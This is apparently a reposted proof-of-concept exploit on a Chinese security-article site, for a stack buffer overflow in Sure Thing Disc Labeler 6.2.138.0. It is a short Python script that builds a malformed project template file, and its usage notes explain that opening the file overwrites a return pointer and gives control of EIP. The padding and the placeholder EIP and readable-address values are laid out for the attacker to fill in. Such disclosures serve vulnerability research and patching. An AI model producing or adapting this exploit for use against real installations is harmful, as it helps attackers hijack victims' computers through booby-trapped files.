Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)

来源：albatross@loftwing.net 作者：Johnson 发布时间：2017-05-22

# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
# Date: 5-19-17
# Exploit Author: Chance Johnson (albatross@loftwing.net)
# Vendor Homepage: http://www.surething.com/
# Software Link: http://www.surething.com/disclabeler
# Version: 6.2.138.0
# Tested on: Windows 7 x64 / Windows 10
#
# Usage:
#    Open the project template generated by this script.
#    If a readable address is placed in AVread, no exception will be thrown
#    and a return pointer will be overwritten giving control over EIP when
#    the function returns.

header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'

junk1 =   'D'*10968
EIP    =   'A'*4            # Direct RET overwrite
junk2 =   'D'*24
AVread =   'B'*4            # address of any readable memory
junk3 =   'D'*105693

buf = header + junk1 + EIP + junk2 + AVread + junk3

print "[+] Creating file with %d bytes..." % len(buf)

f=open("exp.std",'wb')
f.write(buf)
f.close()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告